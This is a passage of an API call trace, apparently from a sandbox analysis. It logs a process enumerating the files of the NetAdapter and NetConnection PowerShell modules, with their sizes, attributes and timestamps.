lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcea, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.050] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e50, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.050] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2005, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.cdxml", cAlternateFileName="")) returned 1 [0265.050] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x148f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.050] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.051] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRdma.cdxml", cAlternateFileName="")) returned 1 [0265.051] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRdma.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.051] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c691a7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c691a7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a70, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRsc.cdxml", cAlternateFileName="")) returned 1 [0265.051] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRsc.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.051] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x27d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRss.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.051] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1808, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRss.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.052] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2701, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriov.cdxml", cAlternateFileName="")) returned 1 [0265.052] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe42, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriov.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.052] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriovVf.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.052] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriovVf.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.052] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterStatistics.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.052] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterStatistics.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.053] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2319, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmq.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.053] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb51, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmq.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.053] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmqQueue.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.053] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe06, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmqQueue.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.053] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9df, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVPort.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.054] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVPort.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.054] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc82, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.054] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.psd1", cAlternateFileName="")) returned 1 [0265.054] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb225, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.054] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb225, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Types.ps1xml", cAlternateFileName="")) returned 0 [0265.054] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.055] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter\\netadapter.psd1")) returned 0x20 [0265.055] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.055] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0265.055] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", lpFilePart=0x0) returned 0x41 [0265.055] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.055] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.056] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.cdxml", cAlternateFileName="")) returned 1 [0265.056] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x52c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.format.ps1xml", cAlternateFileName="")) returned 1 [0265.056] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x791, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.types.ps1xml", cAlternateFileName="")) returned 1 [0265.056] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection.psd1", cAlternateFileName="")) returned 1 [0265.056] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection.psd1", cAlternateFileName="")) returned 0 [0265.057] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.057] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0265.057] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", lpFilePart=0x0) returned 0x41 [0265.057] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.057] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.057] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.cdxml", cAlternateFileName="")) returned 1 [0265.058] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x52c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.format.ps1xml", cAlternateFileName="")) returned 1 [0265.058] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x791, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.types.ps1xml", cAlternateFileName="")) returned 1 [0265.058] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection.psd1", cAlternateFileName="")) returned 1 [0265.058] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.058] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.058] GetFullPathNameW (in: 